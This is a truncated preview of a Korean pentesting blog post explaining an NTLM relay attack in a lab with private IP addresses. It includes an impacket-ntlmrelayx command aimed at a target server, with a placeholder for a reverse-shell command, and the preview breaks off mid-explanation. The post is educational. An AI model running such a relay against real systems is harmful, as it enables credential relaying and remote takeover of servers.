Pentesting (1) 썸네일형 리스트형 쉽게 이해하는 NTLM Relay attack ntlmrelayx를 이용한 NTLM Relay attack처음엔 너무 복잡한 개념이라 이해하기 어려웠는데, gpt 와 몇 번의 소통을 통해 좀 이해했더니 재밌어서 기록..해당 공격의 프로세스는 다음과 같다. 가정)현재 192.168.1.1 : 시스템 제어권을 획득한 상황공격자 pc 192.168.1.2우리가 탈취할 서버 192.168.1.3 1. 시스템 제어권을 획득한 192.168.1.1 서버에서 smb 접속하려는데, 없는 공격자 서버에 smb 요청2. 공격자는 미리 ntlmrelayx 서버 listen하고 있음impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.1.3 -c "리버스 쉘 연결 cmd"-t : 우리가 타켓팅할 서버 등록해둠-c :.. 이전 1 다음
